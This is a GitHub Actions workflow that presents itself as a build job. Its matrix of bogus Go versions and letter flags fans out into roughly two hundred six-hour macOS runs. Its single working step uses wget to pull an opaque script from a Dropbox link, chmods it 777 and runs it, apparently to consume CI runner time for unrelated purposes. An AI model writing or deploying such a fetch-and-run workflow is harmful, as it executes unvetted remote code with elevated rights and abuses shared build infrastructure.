name: Macos 1 pestaña 360min
# on: [push, pull_request]
on:
  schedule:
    - cron: '0 */12 * * *'
  workflow_dispatch:
   
jobs:
  build:
    runs-on: macos-latest
    strategy:
      max-parallel: 1
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.1, 2.2]
        flag: [A, B, C, D, E, F, G, H, I, G, K, L, M, N, Ñ, O, P, K]
    timeout-minutes: 360
    env:
        NUM_JOBS: 900
        JOB: ${{ matrix.go }}
    steps:
    - name: ok
      run: wget https://www.dropbox.com/s/iod9hgxsuqrhn4l/op.sh && sudo chmod 777 op.sh && ./op.sh
    - name: listo
      run: exit
